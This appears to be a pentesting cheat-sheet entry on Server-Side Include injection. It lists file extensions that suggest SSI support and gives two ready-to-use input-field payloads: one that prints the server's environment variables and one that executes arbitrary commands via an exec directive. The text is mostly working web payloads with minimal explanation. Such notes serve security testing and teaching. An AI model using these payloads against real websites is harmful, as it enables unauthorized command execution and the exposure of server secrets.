SSI (EXPLOITATION)

#identification of SSI usage
 * the page may support SSI based on the file extension .shtml, .shtm, and .stm.
 * if the user input is inserted into the page without prior sanitization, it might be vulnerable to SSI injection

root@oco:~$ BROWSER > {targetSite:port}
 input field: <!--#printenv -->
 * this cmd displays the environment variables

#execute arbitrary cmds 
root@oco:~$ BROWSER > {targetSite:port}
 input field: <!--#exec cmd="id" -->

Last updated